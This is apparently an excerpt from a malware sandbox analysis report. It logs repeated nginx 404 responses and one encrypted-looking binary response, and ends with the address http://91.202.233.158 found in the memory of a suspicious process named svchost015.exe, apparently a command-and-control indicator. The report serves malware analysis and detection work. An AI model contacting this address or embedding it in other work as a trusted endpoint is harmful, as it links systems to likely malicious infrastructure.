              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ|~B9=#
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158
